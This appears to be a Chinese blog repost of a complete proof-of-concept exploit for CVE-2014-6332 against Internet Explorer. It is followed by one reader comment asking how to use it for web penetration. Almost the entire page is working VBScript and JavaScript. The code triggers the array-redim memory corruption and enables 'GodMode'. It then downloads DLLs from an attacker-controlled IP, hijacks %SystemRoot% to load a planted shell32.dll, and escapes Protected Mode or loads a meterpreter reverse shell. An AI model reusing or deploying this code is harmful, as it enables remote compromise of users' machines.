CVE-2014-6332 PoC 绕过保护模式获取shell

 

<!-- CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode - Tested on IE11 + Windows 7 64-bit References: - original PoC - http://www.exploit-db.com/exploits/35229/ - http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ - http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html - https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf - http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb -->
&nbsp;

<script>// <![CDATA[
var oReq;
function getdll(downloadFile)
{
    oReq = new XMLHttpRequest();
    oReq.open("GET", "http://192.168.1.100/"+downloadFile, true);
    oReq.onreadystatechange = handler;
    oReq.send();
}

function handler()
{
    if (oReq.readyState == 4 && oReq.status == 200) {
        OnDownloadDone();
    }
}

function tolocal()
{
    location.href = "http://localhost:5555/stage2.html"
}
// ]]></script>

<script>// <![CDATA[
' local server files to get medium integrity
downloadFiles = Array("ieshell32.dll", "ielocalserver.dll", "stage2.html")
cacheRegex = Array("^ieshell32[d].dll$", "^ielocalserver[d].dll$", "^stage2[d].htm$")
' reverse meterpreter shell files
'downloadFiles = Array("ieshell32.dll", "metp.dll")
'cacheRegex = Array("^ieshell32[d].dll$", "^metp[d].dll$")
Dim cacheFiles(3)

Dim downloadState
Dim pinTime

Dim oFSO
Dim oWS
Dim shell

function FindFile(path, regexFile)
    FindFile = ""
    For Each f in oFSO.GetFolder(path).Files
        If regexFile.Test(f.Name) Then
            FindFile = f.Name
            Exit For
        End If
    Next    
end function

function SearchCache(path, regexFile)
    SearchCache = ""
    For Each fld in oFSO.GetFolder(path).SubFolders
        'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then
            filename = FindFile(path & "" & fld.Name, regexFile)
            If filename <> "" Then
                SearchCache = path & "" & fld.Name & "" & filename
                Exit For
            End If
        'End If
    Next
end function

function loaddll()
    On Error Resume Next

    Set wshSystemEnv = oWS.Environment("Process")
    tmpDir = oFSO.GetSpecialFolder(2)
    
    tmpSysDir = tmpDir & "System32"
    tmpShellFile = tmpSysDir & "shell32.dll"
    oFSO.CreateFolder(tmpSysDir)
    oFSO.CopyFile cacheFiles(0), tmpShellFile
    
    mydllFile = tmpDir & "" & downloadFiles(1)
    oFSO.CopyFile cacheFiles(1), mydllFile
    wshSystemEnv("MyDllPath") = mydllFile
    
    If (UBound(downloadFiles) = 2) Then
        stage2File = tmpDir & "stage2.html"
        oFSO.CopyFile cacheFiles(2), stage2File
        wshSystemEnv("stage2file") = stage2File
    End If
    
    saveRoot = wshSystemEnv("SystemRoot")
    wshSystemEnv("SaveSystemRoot") = saveRoot
    wshSystemEnv("SystemRoot") = tmpDir
    Set shell = CreateObject("Shell.Application")
    ' have to restore %SystemRoot% in dll, not here
    
    oFSO.DeleteFile tmpShellFile
    oFSO.DeleteFolder tmpSysDir
    
    If (UBound(downloadFiles) = 2) Then
        call tolocal()
    End If
end function

Sub OnDownloadDone()
    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
    cacheDir = cacheDir & "MicrosoftWindowsTemporary Internet FilesLowContent.IE5"
    
    Set regexFile = new regexp
    regexFile.Pattern = cacheRegex(downloadState)
    cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
    If cacheFiles(downloadState) = "" Then
        Exit Sub
    End If
    
    If downloadState = UBound(downloadFiles) Then
        loaddll()
    Else
        downloadState = downloadState + 1
        DoDownload()
    End If
End Sub

Sub DoDownload()
    pinTime = Now
    call getdll(downloadFiles(downloadState))
End Sub

Sub runshell()
    Set oFSO = CreateObject("Scripting.FileSystemObject")
    Set oWS = CreateObject("WScript.Shell")
    downloadState = 0
    DoDownload()
End Sub
 
// ]]></script>

<script>// <![CDATA[
dim arrX()
dim arrY()

dim asize
dim incsize
dim olapPos

Begin()

function Begin()
    On Error Resume Next
    Init()
    If Exploit() = True Then
        EnableGodMode()
        redim Preserve arrX(asize)
        runshell()
    End If
end function

function Init()
    Randomize()
    asize = 13 + 17*rnd(6)
    incsize = 7 + 3*rnd(5)
end function

function Exploit()
    dim i
    Exploit = False
    For i = 0 To 400
        asize = asize + incsize
        If Trigger() = True Then
            Exploit = True
            Exit For
        End If
    Next
end function

function Trigger()
    On Error Resume Next
    dim typev
    dim ofnumele
    
    Trigger = False
    olapPos = asize + 2
    ofnumele = asize + &h8000000
    
    redim Preserve arrX(asize)
    redim arrY(asize)
    redim Preserve arrX(ofnumele)
    
    typev = 1
    arrY(0) = 1.123456789012345678901234567890
    
    If (IsObject(arrX(olapPos-1)) = False) Then
        If (VarType(arrX(olapPos-1)) <> 0) Then
            If (IsObject(arrX(olapPos)) = False) Then
                typev = VarType(arrX(olapPos))
            End If
        End If
    End If
    
    If (typev = &h2f66) Then
        Trigger = True
    Else
        redim Preserve arrX(asize)
    End If
end function

function ReadMemInt(addr)
    arrY(0) = 0
    arrX(olapPos) = addr+4
    arrY(0) = 8
    ReadMemInt = lenb(arrX(olapPos))
end function

function EnableGodMode()
    i = LeakFnAddr()
    i = ReadMemInt(i+8)
    i = ReadMemInt(i+16)
    
    myarray = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uFFFF%u7FFF%u0000%u0000")
    arrX(olapPos+2) = myarray
    arrY(2) = 8192 + 12
    
    EnableGodMode = False
    For k=0 To &h60 step 4
        j = ReadMemInt(i+&h120+k)
        If (j = 14) Then
            arrX(olapPos+2)(i+&h11c+k) = arrY(4)
            EnableGodMode = True
            Exit For
        End If
    Next
end function

sub dummyfn()
end sub

function LeakFnAddr()
    On Error Resume Next
    i = dummyfn
    i = null
    arrY(0) = 0
    arrX(olapPos) = i
    arrY(0) = 3
    LeakFnAddr = arrX(olapPos)
end function
// ]]></script>


1 条评论

  1. 未末

    怎么利用这个漏洞做网页渗透呀

发表评论